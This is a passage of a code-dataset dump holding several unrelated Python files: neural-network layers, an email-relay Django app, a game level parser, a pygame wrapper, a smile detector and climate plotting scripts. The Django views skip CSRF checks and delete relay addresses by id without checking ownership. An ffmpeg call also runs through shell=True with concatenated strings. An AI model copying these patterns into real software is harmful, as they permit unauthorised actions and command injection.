Ding, Ruoyan Wang, Fei Mao and Graham Taylor\n    All rights reserved.\n    Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:\n    1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\n    2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\n    3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.\n    THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n    \"\"\"\n    defaults = {\n        'filter_shape': (96, 3, 11, 11), # bc01\n        'convstride': 4,\n        'padsize': 0,\n        'group': 1,\n        'poolsize': 3,\n        'poolstride': 2,\n        'bias_init': 0,\n        'local_response_normalization': False,\n        'convolution': T.nnet.conv2d,\n        'activation': 'rectifier',\n        \"weights_init\": \"gaussian\",\n        'weights_interval': 'montreal', # if the weights_init was 'uniform', how to initialize from uniform\n        'weights_mean': 0, # mean for gaussian weights init\n        'weights_std': 0.01, # standard deviation for gaussian weights init\n    }\n    def __init__(self, inputs_hook, input_shape=None, filter_shape=None, convstride=None, padsize=None, group=None,\n                 poolsize=None, poolstride=None, bias_init=None, local_response_normalization=None,\n                 convolution=None, activation=None, params_hook=None, config=None, defaults=defaults):\n        # combine everything by passing to Model's init\n        super(ConvPoolLayer, self).__init__(**{arg: val for (arg, val) in locals().iteritems() if arg != 'self'})\n        # configs can now be accessed through self!\n\n        # deal with the inputs coming from inputs_hook - necessary for now to give an input hook\n        # inputs_hook is a tuple of (Shape, Input)\n        if self.inputs_hook:\n            assert len(self.inputs_hook) == 2, \"expecting inputs_hook to be tuple of (shape, input)\"\n            self.input_shape = self.inputs_hook[0] or self.input_shape\n            self.input = inputs_hook[1]\n        else:\n            self.input = T.ftensor4(\"X\")\n\n        #######################\n        # layer configuration #\n        #######################\n        # activation function!\n        # if a string name was given, look up the correct function from our utils.\n        if isinstance(self.activation, six.string_types):\n            self.activation_func = get_activation_function(self.activation)\n        # otherwise, if a 'callable' was passed (i.e. 
custom function), use that directly.\n        else:\n            assert callable(self.activation), \"Activation function either needs to be a string name or callable!\"\n            self.activation_func = self.activation\n\n        # expect image_shape to be bc01!\n        self.channel = self.input_shape[1]\n\n        # shortening a word\n        self.lrn = self.local_response_normalization\n\n        # if lib_conv is cudnn, it works only on square images and the grad works only when channel % 16 == 0\n\n        assert self.group in [1, 2], \"group argument needs to be 1 or 2 (1 for default conv2d)\"\n\n        self.filter_shape = numpy.asarray(self.filter_shape)\n        self.input_shape = numpy.asarray(self.input_shape)\n\n        if self.lrn:\n            self.lrn_func = cross_channel_normalization_bc01\n\n        ################################################\n        # Params - make sure to deal with params_hook! #\n        ################################################\n        if self.group == 1:\n            if self.params_hook:\n                # make sure the params_hook has W and b\n                assert len(self.params_hook) == 2, \\\n                    \"Expected 2 params (W and b) for ConvPoolLayer, found {0!s}!\".format(len(self.params_hook))\n                self.W, self.b = self.params_hook\n            else:\n                # if we are initializing weights from a gaussian\n                if self.weights_init.lower() == 'gaussian':\n                    self.W = get_weights_gaussian(\n                        shape=self.filter_shape, mean=self.weights_mean, std=self.weights_std, name=\"W\"\n                    )\n                # if we are initializing weights from a uniform distribution\n                elif self.weights_init.lower() == 'uniform':\n                    self.W = get_weights_uniform(shape=self.filter_shape, interval=self.weights_interval, name=\"W\")\n                # otherwise not implemented\n                else:\n                    log.error(\"Did not recognize weights_init %s! Please try gaussian or uniform\" %\n                              str(self.weights_init))\n                    raise NotImplementedError(\n                        \"Did not recognize weights_init %s! Please try gaussian or uniform\" %\n                        str(self.weights_init))\n\n            self.b = get_bias(shape=self.filter_shape[0], init_values=self.bias_init, name=\"b\")\n            self.params = [self.W, self.b]\n\n        else:\n            self.filter_shape[0] = self.filter_shape[0] / 2\n            self.filter_shape[1] = self.filter_shape[1] / 2\n\n            self.input_shape[0] = self.input_shape[0] / 2\n            self.input_shape[1] = self.input_shape[1] / 2\n            if self.params_hook:\n                assert len(self.params_hook) == 4, \"expected params_hook to have 4 params\"\n                self.W0, self.W1, self.b0, self.b1 = self.params_hook\n            else:\n                self.W0 = get_weights_gaussian(shape=self.filter_shape, name=\"W0\")\n                self.W1 = get_weights_gaussian(shape=self.filter_shape, name=\"W1\")\n                self.b0 = get_bias(shape=self.filter_shape[0], init_values=self.bias_init, name=\"b0\")\n                self.b1 = get_bias(shape=self.filter_shape[0], init_values=self.bias_init, name=\"b1\")\n            self.params = [self.W0, self.b0, self.W1, self.b1]\n\n        #############################################\n        # build appropriate graph for conv. 
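# Sketch only: shape bookkeeping for the group=2 branch above, which halves the
# filter and channel counts, convolves each half separately, and concatenates.
# 1x1 kernels via einsum keep the example short; all values are invented.
import numpy as np

x = np.random.rand(2, 4, 5, 5)       # (batch, channels, height, width), bc01
W0 = np.random.rand(3, 2, 1, 1)      # half the filters see the first half of the channels
W1 = np.random.rand(3, 2, 1, 1)      # the other half sees the remaining channels
half0 = np.einsum('bchw,fcij->bfhw', x[:, :2], W0)   # a 1x1 convolution
half1 = np.einsum('bchw,fcij->bfhw', x[:, 2:], W1)
out = np.concatenate([half0, half1], axis=1)         # channel-wise concat, as in the layer
assert out.shape == (2, 6, 5, 5)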
version #\n #############################################\n self.output = self.build_computation_graph()\n\n # Local Response Normalization (for AlexNet)\n if self.lrn:\n self.output = self.lrn_func(self.output)\n\n log.debug(\"convpool layer initialized with shape_in: %s\", str(self.input_shape))\n\n def build_computation_graph(self):\n if self.group == 1:\n conv_out = self.convolution(img=self.input,\n kerns=self.W,\n subsample=(self.convstride, self.convstride),\n border_mode=(self.padsize, self.padsize))\n conv_out = conv_out + self.b.dimshuffle('x', 0, 'x', 'x')\n\n else:\n conv_out0 = self.convolution(img=self.input[:, :self.channel / 2, :, :],\n kerns=self.W0,\n subsample=(self.convstride, self.convstride),\n border_mode=(self.padsize, self.padsize))\n conv_out0 = conv_out0 + self.b0.dimshuffle('x', 0, 'x', 'x')\n\n\n conv_out1 = self.convolution(img=self.input[:, self.channel / 2:, :, :],\n kerns=self.W1,\n subsample=(self.convstride, self.convstride),\n border_mode=(self.padsize, self.padsize))\n conv_out1 = conv_out1 + self.b1.dimshuffle('x', 0, 'x', 'x')\n\n conv_out = T.concatenate([conv_out0, conv_out1], axis=1)\n\n # ReLu by default\n output = self.activation_func(conv_out)\n\n # Pooling\n if self.poolsize != 1:\n if has_cudnn:\n output = dnn.dnn_pool(output,\n ws=(self.poolsize, self.poolsize),\n stride=(self.poolstride, self.poolstride))\n else:\n output = downsample.max_pool_2d(output,\n ds=(self.poolsize, self.poolsize),\n st=(self.poolstride, self.poolstride))\n\n return output\n\n def get_inputs(self):\n return [self.input]\n\n def get_outputs(self):\n return self.output\n\n def get_params(self):\n return self.params\n\n def save_args(self, args_file=\"convpool_config.pkl\"):\n super(ConvPoolLayer, self).save_args(args_file)\n","sub_path":"opendeep/models/single_layer/convolutional.py","file_name":"convolutional.py","file_ext":"py","file_size_in_byte":24197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"441562648","text":"from email.utils import parseaddr\nimport json\n\nfrom decouple import config\nfrom socketlabs.injectionapi import SocketLabsClient\nfrom socketlabs.injectionapi.message.basicmessage import BasicMessage\nfrom socketlabs.injectionapi.message.emailaddress import EmailAddress\n\nfrom django.conf import settings\nfrom django.core.exceptions import PermissionDenied\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .models import RelayAddress\n\n\n@csrf_exempt\ndef index(request):\n if not request.user:\n raise PermissionDenied\n if request.method == 'POST':\n return _index_POST(request)\n return redirect('profile')\n\n\ndef _index_POST(request):\n api_token = request.POST.get('api_token', None)\n if not api_token:\n raise PermissionDenied\n user_profile = request.user.profile_set.first()\n if not str(api_token) == str(user_profile.api_token):\n raise PermissionDenied\n if request.POST.get('method_override', None) == 'DELETE':\n return _index_DELETE(request)\n\n RelayAddress.objects.create(user=request.user)\n return redirect('profile')\n\n\n#TODO: add csrf here? 
# ...or make ids uuid so they can't be guessed?\ndef _index_DELETE(request):\n    try:\n        relay_address = RelayAddress.objects.get(\n            id=request.POST['relay_address_id']\n        )\n        relay_address.delete()\n        return redirect('profile')\n    except RelayAddress.DoesNotExist as e:\n        print(e)\n        return HttpResponse(\"Address does not exist\")\n\n\n@csrf_exempt\ndef inbound(request):\n    if _get_secret_key(request) != settings.SOCKETLABS_SECRET_KEY:\n        return HttpResponse(\"Unauthorized\", status=401)\n\n    if (request.content_type == 'application/x-www-form-urlencoded' and\n        request.POST['Type'] == 'Validation'):\n        return HttpResponse(settings.SOCKETLABS_VALIDATION_KEY)\n\n    if request.content_type != 'application/json':\n        return HttpResponse(\"Unsupported Media Type\", status=415)\n\n    json_body = json.loads(request.body)\n    db_message = _inbound_logic(json_body)\n\n    return HttpResponse(\"Created\", status=201)\n\n\ndef _get_secret_key(request):\n    if request.content_type == 'application/x-www-form-urlencoded':\n        return request.POST['SecretKey']\n    if request.content_type == 'application/json':\n        json_body = json.loads(request.body)\n        return json_body['SecretKey']\n    return ''\n\n\ndef _inbound_logic(json_body):\n    message_data = json_body['Message']\n    email_to = parseaddr(message_data['To'][0]['EmailAddress'])[1]\n    local_portion = email_to.split('@')[0]\n    from_address = parseaddr(message_data['From']['EmailAddress'])[1]\n    subject = message_data.get('Subject')\n    text = message_data.get('TextBody')\n    html = message_data.get('HtmlBody')\n\n    # TODO: do we need this in SocketLabs?\n    # 404s make sendgrid retry the email, so respond with 200 even if\n    # the address isn't found\n    try:\n        relay_address = RelayAddress.objects.get(address=local_portion)\n    except RelayAddress.DoesNotExist as e:\n        print(e)\n        return HttpResponse(\"Address does not exist\")\n\n    # Forward to real email address\n    sl_message = BasicMessage()\n    sl_message.subject = subject\n    sl_message.html_body = html\n    sl_message.plain_text_body = text\n    relay_from_address, relay_from_display = _generate_relay_From(from_address)\n    sl_message.from_email_address = EmailAddress(\n        relay_from_address, relay_from_display\n    )\n    sl_message.to_email_address.append(EmailAddress(relay_address.user.email))\n    socketlabs_client = SocketLabsClient(\n        settings.SOCKETLABS_SERVER_ID, settings.SOCKETLABS_API_KEY\n    )\n    response = socketlabs_client.send(sl_message)\n    print(response)\n\n\ndef _generate_relay_From(original_from_address):\n    relay_display_name, relay_from_address = parseaddr(\n        settings.RELAY_FROM_ADDRESS\n    )\n    return relay_from_address, '%s via Firefox Private Relay' % (\n        original_from_address\n    )\n","sub_path":"emails/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"81763608","text":"# -*- coding: iso-8859-15 -*-\r\n\r\n#Helper function to advance fin easily\r\ndef parcourir(tab, nb, String):\r\n\twhile nb < len(tab) and tab[nb] != String:\r\n\t\tnb += 1\r\n\treturn nb\r\n\r\nfrom Level import Level\r\n#reads a level from its relative position. 
The exact directory must be given\r\ndef lecture(pos):\r\n\r\n\tlecture = open(pos, \"r\")\r\n\t\r\n\t#turn the file into one big String\r\n\tcontenu = lecture.read()\r\n\t\r\n\t#separators\r\n\tbarre = '|'\r\n\tvirgule = ';'\r\n\t\r\n\t\r\n\tfin = 0\t#start at 0\r\n\tfin = parcourir(contenu, fin, barre)#first bar (after the name)\r\n\tnom = contenu[4 : fin]#The name runs from character 4 (after the \"NOM:\") up to the first bar\r\n\r\n\tfin = fin + 6#skip the name\r\n\tdebut = fin\r\n\tfin = parcourir(contenu, fin, virgule)#move to the next semicolon\r\n\t\r\n\trang1 = str(contenu[debut : fin])#read the ranks (fixed part of the level file)\r\n\trang1 = int(rang1)\r\n\t\r\n\tfin += 1\r\n\tdebut = fin\r\n\t\r\n\tfin = parcourir(contenu, fin, virgule)\r\n\trang2 = str(contenu[debut : fin])\r\n\trang2 = int(rang2)\r\n\t\r\n\tfin += 1\r\n\tdebut = fin\r\n\t\r\n\tfin = parcourir(contenu, fin, virgule)\r\n\trang3 = str(contenu[debut : fin])\r\n\trang3 = int(rang3)#end of the ranks\r\n\t\r\n\t\r\n\t\r\n\tfin += 1\r\n\tdebut = fin# skip the semicolon\r\n\t\r\n\tfin = parcourir(contenu, fin, barre)#move to the last bar, after the positions\r\n\t\r\n\trang = contenu[debut : fin]\r\n\tposition = [rang.split(',')]#store position as an array\r\n\t\r\n\r\n\twhile contenu[fin] != '#' :\r\n\t\tfin += 1\r\n\t\tdebut = fin\r\n\t\tif contenu[fin] != '#' :\r\n\t\t\tfin = parcourir(contenu, fin, barre)\r\n\t\t\trang = contenu[debut : fin]\r\n\t\t\tposition.append(rang.split(','))#and fill it with the right values\r\n\r\n\r\n\tlevel = Level(nom, rang1, rang2, rang3)#create our level object\r\n\r\n\tlevel.setPosition(position)\r\n\t\r\n\treturn(level)#and return it \r\n\t\r\n#reads the level's rank from the player's save file, ignoring the VOID:0\r\n#Save format: VOID:0,levelname:rank#\r\ndef lecturesave(niveau):\r\n\t#open the file holding the player's saves\r\n\tlecture = open(\"saves/save.sv\", \"r\")\r\n\t\r\n\tdebut = 0\r\n\tfin = 0\r\n\tretour = 0\r\n\t\r\n\t#turn the file into one big String\r\n\tcontenu = lecture.read()\r\n\t\r\n\twhile str(contenu[debut+1:(fin)]) != niveau.getNom() and str(contenu[fin]) != \"#\":#as long as it has not been found and we are not at the end of the file\r\n\t\tif fin != 0:\r\n\t\t\tdebut = fin + 2\r\n\t\tfin += 1\r\n\t\twhile str(contenu[fin]) != \"#\" and str(contenu[fin]) != \":\":\r\n\t\t\tfin += 1\r\n\t\r\n\tif str(contenu[fin]) != \"#\":\r\n\t\tretour = int(contenu[fin+1])\r\n\t\t\r\n\treturn(retour)\r\n","sub_path":"lecture.py","file_name":"lecture.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"330177302","text":"import time\n\nimport pygame\n\nfrom _8086 import __version__ as _module_version\nfrom .utils import debug\n\n_TIMEOUT = int((1 / 60) * 1000)\n\n\nclass _8086_Window:\n    '''Class to provide an internal interface to pygame.'''\n    pygame.init()\n\n    try:\n        __font = pygame.font.SysFont('firacode', 20)\n    except Exception:\n        __font = pygame.font.Font('freesans.ttf', 20)\n\n    __version__ = _module_version\n\n    def __init__(self):\n        self.__key_buffer = None\n        self.__key_lock = 0\n\n        self.__screen = None\n        self._width = 500\n        self._height = 500\n\n        self.children = []\n\n    def __repr__(self):\n        return f'<_8086.Window Object @ 0x{hex(id(self))[2:].upper()}>'\n\n    def __enter__(self):\n        if type(self.__screen) != pygame.Surface:\n            self.__screen = 
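# Illustrative sketch: the save format documented above ("VOID:0,levelname:rank#")
# can also be unpacked with split(); the level names and ranks here are invented.
save = "VOID:0,level_one:2,level_two:3#"
ranks = dict(entry.split(":") for entry in save.rstrip("#").split(","))
assert ranks["level_one"] == "2"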
pygame.display.set_mode([self.width, self.height])\n return self \n\n def __exit__(self, *args):\n pass\n\n def __iter__(self):\n debug('Window: Entering hot loop!')\n\n while self.children:\n child = self.children.pop()\n debug(f'Loaded child {iter(child)}')\n\n return self\n\n def __next__(self):\n pygame.event.pump()\n pygame.time.wait(_TIMEOUT)\n\n @property\n def key(self):\n return self.__key_buffer\n\n @property\n def width(self):\n return self._width\n\n @property\n def height(self):\n return self._height\n\n @property\n def screen(self):\n return self.__screen\n\n @property\n def font(self):\n return self.__font \n\n def blank(self):\n self.screen.fill((0, 0, 0))\n self.update()\n\n def update(self, *args, **kwargs):\n pygame.display.update(*args, **kwargs)\n\n def rect(self, x, y, w, h, color, screen=None):\n pygame.draw.rect(screen or self.__screen, color, (x, y, w, h))\n\n def text(self, text, position, color=None, size=80, font=__font, center=False):\n if not isinstance(text, str):\n data = ''.join(chr(c) for c in text)\n else:\n data = text\n\n surface = font.render(data, True, color or (0, 0, 0))\n rect = surface.get_rect()\n\n if not center:\n rect.topleft = position\n else:\n rect.center = position\n\n self.__screen.blit(surface, rect)\n\n def getch(self):\n if pygame.event.peek((pygame.KEYDOWN, pygame.KEYUP)):\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n self.__key_lock = 0\n self.__key_buffer = event.key\n\n elif event.type == pygame.KEYUP:\n self.__key_buffer = None\n\n if self.__key_lock:\n return None\n\n self.__key_lock = 1\n return self.__key_buffer\n","sub_path":"_8086/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"130130484","text":"'''\nhere we will use the same code in the face detector, along with some more to detect a smile \nif a smile is detected (using haarcascades) then 'smiling' will show beneath the box surrouding the face\nagain, the .xml file with the smile haarcascades must be in the same directory as this file for it to work \n\n'''\n\nfrom cv2 import * \n\n\n# face and smile classifiers \nface_detector = CascadeClassifier('haarcascade_frontalface_default.xml')\nsmile_detector = CascadeClassifier('haarcascade_smile.xml')\n\nwebcam = VideoCapture(0)\n\nwhile True:\n succesful_frame_read, frame = webcam.read()\n\n if not succesful_frame_read:\n break\n\n gray_scaled_frame = cvtColor(frame, COLOR_BGR2GRAY)\n \n faces = face_detector.detectMultiScale(gray_scaled_frame)\n \n\n\n for (x, y, w, h) in faces:\n rectangle(frame, (x, y), (x+h, y+h), (0, 255, 0), 2)\n\n # get the sub frame (using numpy N-dimensional array slicing)\n the_face = frame[y:y+h, x:x+w]\n \n the_face_grayscale = cvtColor(the_face, COLOR_BGR2GRAY)\n \n smiles = smile_detector.detectMultiScale(the_face_grayscale,\n scaleFactor=1.7,\n minNeighbors=20)\n\n\n if len(smiles) > 0:\n putText(frame, 'smiling', (x, y+h+40), fontScale=1, \n fontFace=FONT_HERSHEY_TRIPLEX, color=(255, 255, 255))\n\n\n imshow(\"smile detector\", frame)\n key = waitKey(30)\n\n if key==81 or key==113:\n break\n\nwebcam.release()\ndestroyAllWindows()\n\n\nprint(\"Done\\a\")\n\n","sub_path":"detectors/smile_detector.py","file_name":"smile_detector.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"453401609","text":"'''6/12/2018 Plot pentad by pentad development of 
JRA Rossby no and precip\n'''\n\nimport numpy as np\nimport xarray as xr\nimport matplotlib.pyplot as plt\nfrom pylab import rcParams\nimport sh\nfrom windspharm.xarray import VectorWind\nimport matplotlib.patches as patches\nfrom data_handling_updates import gradients as gr, model_constants as mc\n\n\ndef plot_vort_dev(video=False, threed=True):\n \n data_w = xr.open_dataset('/disca/share/rg419/jra_omega_pentad_clim.nc')\n data_u = xr.open_dataset('/disca/share/rg419/jra_ucomp_pentad_clim.nc')\n data_v_temp = xr.open_dataset('/disca/share/rg419/jra_vcomp_pentad_clim.nc')\n # v has different time coord to u, presumably due to how Stephen has downloaded/averaged. I think the two are equivalent, so just substitute the time dimension into v\n data_v = xr.DataArray(data_v_temp.var34.values, coords={'pentad': data_u.pentad, 'lat': data_u.lat, 'lon': data_u.lon}, dims=('pentad','lat','lon')) \n print('files opened')\n \n data_u = data_u.var33\n data_w = data_w.var39\n \n zon_adv = data_u.sel(lev=20000.) * gr.ddx(data_u.sel(lev=20000.))\n merid_adv = data_v * gr.ddy(data_u.sel(lev=20000.))\n vert_adv = data_w * (gr.ddp(data_u, pname='lev')).sel(lev=20000.)*100.\n \n sinphi = np.sin(data_u.lat * np.pi/180.)\n f = 2.* mc.omega*sinphi\n if threed:\n rossby = (zon_adv + merid_adv + vert_adv)/(f*data_v)\n else:\n rossby = merid_adv/(f*data_v)\n # Start figure with 1 subplots\n rcParams['figure.figsize'] = 10, 5\n rcParams['font.size'] = 14\n\n for i in range(72):\n fig, ax1 = plt.subplots()\n title = 'Pentad ' + str(int(data_u.pentad[i]))\n \n f1 = rossby.sel(pentad=i+1).plot.contourf(x='lon', y='lat', ax=ax1, add_labels=False, add_colorbar=False, extend='both', zorder=1, levels = np.arange(0.,1.1,0.1))\n \n# data_p.precipitation.sel(pentad=i+1).plot.contour(x='lon', y='lat', ax=ax1, add_labels=False, extend='both', zorder=1, levels=np.arange(2.,21.,2.), colors='k') \n ax1.grid(True,linestyle=':')\n ax1.set_ylim(-60.,60.)\n ax1.set_yticks(np.arange(-60.,61.,30.))\n ax1.set_xticks(np.arange(0.,361.,90.))\n ax1.set_title(title)\n land_mask = '/scratch/rg419/python_scripts/land_era/ERA-I_Invariant_0125.nc'\n land = xr.open_dataset(land_mask)\n land.lsm[0,:,:].plot.contour(ax=ax1, x='longitude', y='latitude', levels=np.arange(-1.,2.,1.), add_labels=False, colors='k')\n ax1.set_ylabel('Latitude')\n ax1.set_xlabel('Longitude')\n \n plt.subplots_adjust(left=0.1, right=0.97, top=0.93, bottom=0.05, hspace=0.25, wspace=0.2)\n cb1=fig.colorbar(f1, ax=ax1, use_gridspec=True, orientation = 'horizontal',fraction=0.05, pad=0.15, aspect=60, shrink=0.5)\n \n vidstr=''\n if video:\n vidstr='video/'\n \n if threed:\n plot_dir = '/scratch/rg419/plots/zonal_asym_runs/gill_development/jra/' + vidstr + '/rossby3d/' \n else:\n plot_dir = '/scratch/rg419/plots/zonal_asym_runs/gill_development/jra/' + vidstr + '/rossby/' \n mkdir = sh.mkdir.bake('-p')\n mkdir(plot_dir)\n \n if video:\n plt.savefig(plot_dir + 'rossby_and_precip_' + str(int(data_u.pentad[i])) + '.png', format='png')\n else:\n plt.savefig(plot_dir + 'rossby_and_precip_' + str(int(data_u.pentad[i])) + '.pdf', format='pdf')\n plt.close()\n\n\nimport subprocess\ndef make_video(filepattern, output):\n command = 'ffmpeg -framerate 5 -y -start_number 30 -i ' + filepattern + ' -vframes 45 -c:v libx264 -r 6 -pix_fmt yuv420p -vf scale=3200:-2 ' + output \n subprocess.call([command], shell=True)\n \n\nif __name__ == \"__main__\":\n\n #plot_vort_dev(threed=True)\n plot_vort_dev(threed=False)\n # plot_vort_dev('half_shallow', land_mask = 
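# Back-of-envelope check of the Coriolis parameter f = 2*omega*sin(lat) used
# above; mc.omega is not shown in this record, so Earth's rotation rate
# ~7.292e-5 rad/s is assumed here.
import numpy as np

omega = 7.292e-5                              # rad/s, assumed value
f = 2.0 * omega * np.sin(np.deg2rad(30.0))    # ~7.29e-5 1/s at 30N
print(f)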
'/scratch/rg419/Experiments/asym_aquaplanets/input/half_shallow.nc', video=True, threed=True)\n\n #make_video('/scratch/rg419/plots/zonal_asym_runs/gill_development/half_shallow/video/rossby3d/rossby_and_precip_%02d.png', \n # '/scratch/rg419/plots/zonal_asym_runs/gill_development/half_shallow/video/rossby3d/rossby_and_precip.mp4')\n\n \n ","sub_path":"zonal_asym_runs/rossby_precip_jra.py","file_name":"rossby_precip_jra.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"486347345","text":"from __future__ import print_function\nimport torch, sys\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom src.util import sprint\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\nfrom torchvision.datasets import MNIST, CIFAR10\nfrom sklearn.metrics import *\nimport pandas as pd\n\nDATASETS = {'mnist' : MNIST, 'cifar' : CIFAR10}\nSHAPE = {'mnist' : (1, 28, 28), 'cifar' : (3, 32, 32)}\nCLASS = {'mnist' : 10, 'cifar' : 10}\n\n''' UTIL '''\ndef pad(k):\n return int(np.floor(float(k) / 2))\n\n''' DEFAULT '''\nclass MaskTensor(object):\n def __init__(self, masks, shape):\n super(MaskTensor, self).__init__()\n self.n = len(masks)\n if self.n > 0:\n self.masks = [torch.from_numpy(m).float() for m in masks]\n else:\n self.masks = None\n self.shape = shape\n def __call__(self, x):\n if self.masks == None:\n return x\n X = torch.stack([m * x for m in self.masks], 0)\n return X.view(self.shape[0] * self.n, self.shape[1], self.shape[2])\n\nclass Net(nn.Module):\n def __init__(self, masks, s):\n super(Net, self).__init__()\n ''' in/out '''\n self.masks = masks\n self.c, self.w1, self.w2 = s\n self.n0 = self.c * (len(self.masks) if len(self.masks) > 0 else 1)\n self.n = len(masks)\n ''' neurons '''\n # convolution\n self.n1 = self.n0 * 2\n self.n2 = self.n0 * 4\n self.k1, self.k2 = 4, 4\n self.s1, self.s2 = 1, 1\n self.p1,self.p2 = self.k1 / 2, self.k2 / 2\n self.x1 = self.w1 / (self.n1/self.n0) / (self.n2/self.n1)\n self.x2 = self.w2 / (self.n1/self.n0) / (self.n2/self.n1)\n # connected\n # self.n3 = self.n0 * 64 #/ (self.s1 * self.s2)\n # self.n4 = self.n0 * 32 #/ (self.s1 * self.s2)\n # self.n5 = self.n0 * 16 #/ (self.s1 * self.s2)\n # self.n6 = self.n0 * 8\n # self.n7 = self.n0 * 4\n # self.n8 = self.n0 * 2\n self.n3 = self.n2 * self.x1 * self.x2\n self.n4 = self.n3 / 2\n self.n5 = self.n4 / 2\n self.n6 = self.n5 / 2\n self.n7 = self.n6 / 2\n self.n8 = self.n7 / 2\n self.n9 = self.n8 / 2\n\n ''' layers '''\n # convolution\n self.conv1 = nn.Conv2d(self.n0, self.n1, self.k1, self.s1, self.p1)\n self.conv2 = nn.Conv2d(self.n1, self.n2, self.k2, self.s2, self.p2)\n self.conv2_drop = nn.Dropout2d()\n # connected\n self.fc1 = nn.Linear(self.n3, self.n4)\n self.fc2 = nn.Linear(self.n4, self.n5)\n self.fc3 = nn.Linear(self.n5, self.n6)\n self.fc4 = nn.Linear(self.n6, self.n7)\n self.fc5 = nn.Linear(self.n7, self.n8)\n self.fc6 = nn.Linear(self.n8, self.n9)\n self.fc7 = nn.Linear(self.n9, self.n)\n\n def view(self, x):\n return x.view(-1, self.n3)\n\n def forward(self, x):\n ''' convolution '''\n # in -> conv1\n # print(x.shape)\n x = self.conv1(x)\n x = F.max_pool2d(x, 2)\n x = F.relu(x)\n # conv1 -> conv2\n # print(x.shape)\n x = self.conv2(x)\n x = self.conv2_drop(x)\n x = F.max_pool2d(x, 2)\n x = F.relu(x)\n # print(x.shape)\n\n ''' connected '''\n x = self.view(x)\n # print(x.shape)\n # conv2 -> linear1\n x = self.fc1(x)\n x 
= F.relu(x)\n x = F.dropout(x, training=self.training)\n # linear1 -> linear2\n x = self.fc2(x)\n x = F.relu(x)\n # linear2 -> linear3\n x = self.fc3(x)\n x = F.relu(x)\n # linear3 -> linear4\n x = self.fc4(x)\n x = F.relu(x)\n # linear4 -> linear5\n x = self.fc5(x)\n x = F.relu(x)\n # linear5 -> linear6\n x = self.fc6(x)\n x = F.relu(x)\n # linear6 -> linear7 (out)\n x = self.fc7(x)\n return F.log_softmax(x, dim=1)\n\n''' RUN TRAIN '''\ndef train(args, model, device, train_loader, optimizer, epoch):\n model.train()\n if args.verbose:\n sprint(1, '[ %d train' % epoch)\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n if args.verbose:\n if batch_idx % args.log == 0:\n sprint(2, '| {:.0f}%\\tloss:\\t{:.6f}'.format(\n 100. * batch_idx / len(train_loader),\n loss.item()))\n\n''' RUN TEST '''\ndef test(args, model, device, test_loader, epoch):\n model.eval()\n test_loss = 0\n correct = 0\n dfp, dfl = pd.DataFrame(), pd.DataFrame()\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n dfp = dfp.append(pd.DataFrame(F.softmax(output,dim=1).tolist()), sort=False, ignore_index=True)\n dfl = dfl.append(pd.DataFrame(target.tolist()), sort=False, ignore_index=True)\n\n y = [l[0] for l in dfl.values]\n test_loss /= len(test_loader.dataset)\n accuracy = float(100. * correct) / float(len(test_loader.dataset))\n score = 100 / (1 + log_loss(y, dfp.values, eps=1E-15))\n sprint(1, '[ {}\\ttest\\t{:.5f}\\t{:.4f}\\t{:.2f}%'.format(epoch, test_loss, score, accuracy))\n return test_loss\n\n''' RUN '''\ndef cnet(args, masks, stats):\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n\n DATA = DATASETS[args.data]\n shape = SHAPE[args.data]\n\n train_loader = DataLoader(DATA('../data', train=True, download=True,\n transform = transforms.Compose([\n transforms.ToTensor(),\n MaskTensor(masks, shape),\n transforms.Normalize(*stats)])),\n batch_size=args.batch, 